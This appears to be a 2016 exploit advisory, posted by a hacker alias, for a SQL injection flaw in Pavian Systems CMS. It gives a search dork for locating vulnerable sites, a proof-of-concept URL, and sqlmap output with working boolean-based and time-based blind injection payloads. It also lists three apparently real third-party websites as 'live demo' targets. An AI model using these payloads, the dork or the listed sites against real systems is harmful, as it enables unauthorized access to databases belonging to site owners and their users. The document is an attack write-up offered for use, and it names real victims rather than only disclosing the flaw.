###################### # Exploit Title : Pavian Systems CMS SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Vendor Homepage : http://paviansystems.com/ # Dork : All Rights Reserved. Design by paviansystems. # Tested on: [ WINDOWS 7] # MyBlog : http://xbadgirl21.blogspot.com/ # skype:xbadgirl21 # Date: 05/10/2016 # video Proof : https://youtu.be/1CyISmcwJiU ###################### # [<] DESCRIPTION : ###################### # [+] Pavian Computer Systems is leading web and software development company # [+] that focuses on the areas that are critical to achieving maximum efficiency in IT Environment Utilization # [+] AND an SQL injection has been Detected in Pavian Systems CMS ###################### # [<] Poc : ###################### # [ALL] Parameters Vulnerable To SQLi # http://localhost/allp.php?id=[SQLi] ###################### # [<] SQLmap PoC: ###################### # GET parameter 'product_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N # sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests: # --- # Parameter: product_id (GET) # Type: boolean-based blind # Title: AND boolean-based blind - WHERE or HAVING clause # Payload: product_id=38' AND 2172=2172 AND 'vXuF'='vXuF # # Type: AND/OR time-based blind # Title: MySQL >= 5.0.12 AND time-based blind # Payload: product_id=38' AND SLEEP(5) AND 'nneA'='nneA # --- ###################### # [<] Live Demo : ###################### # http://cit84.com/reflections_detail.php?artid=2 # http://www.growingcrops.in/services.php?id=54 # http://www.vgaexports.com/product_detail.php?product_id=38 ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################